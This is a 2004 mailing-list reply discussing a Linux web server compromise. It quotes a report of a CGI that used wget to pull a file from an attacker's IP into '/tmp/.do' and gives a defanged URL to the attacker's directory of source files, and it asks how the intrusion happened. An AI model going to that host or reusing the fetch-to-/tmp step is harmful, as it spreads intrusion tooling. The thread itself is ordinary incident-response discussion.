Hi Mark, I'm not sure I can follow everything concerning this issue. Maybe you could clarify this somehow so that a n00b liek me can follow ;-) Am Die, den 13.01.2004 schrieb Retallack, Mark (Siemens) um 16:20:
It looks like the source was left on the server (along with other things):
Is this just another compromised machine or the origin? A portscan shows several open ports and the machine seems to be a Solaris 8 with an estimated uptime of 33 days according to nmap.
httpREMOVE://218.234.171.84/manual/.x/rs.c
Only follow the link if you know what you are doing (and remove the REMOVE text)
I don't quite understand why displaying rs.c in a browser window could be harmful or am I missing something here and this URL initiates something else inside the browser?
The rest of the files:
httpREMOVE://218.234.171.84/manual/.x/
I've given them a look. Has anybody ever heard of a "pokemon squadron hacking team"?!
Some CGI at your webserver did run wget to receive some file from 218.234.171.84 and save it on your disc as "/tmp/.do".
Do you know how this CGI ended up on the machine? By some Apache exploit maybe?
wwwrun:nogroup are standard user and group used for apache.
Can such a CGI do any harm by running as this user? Or are CGI scripts run by Apache given initiated by another user? kind regards, Tobias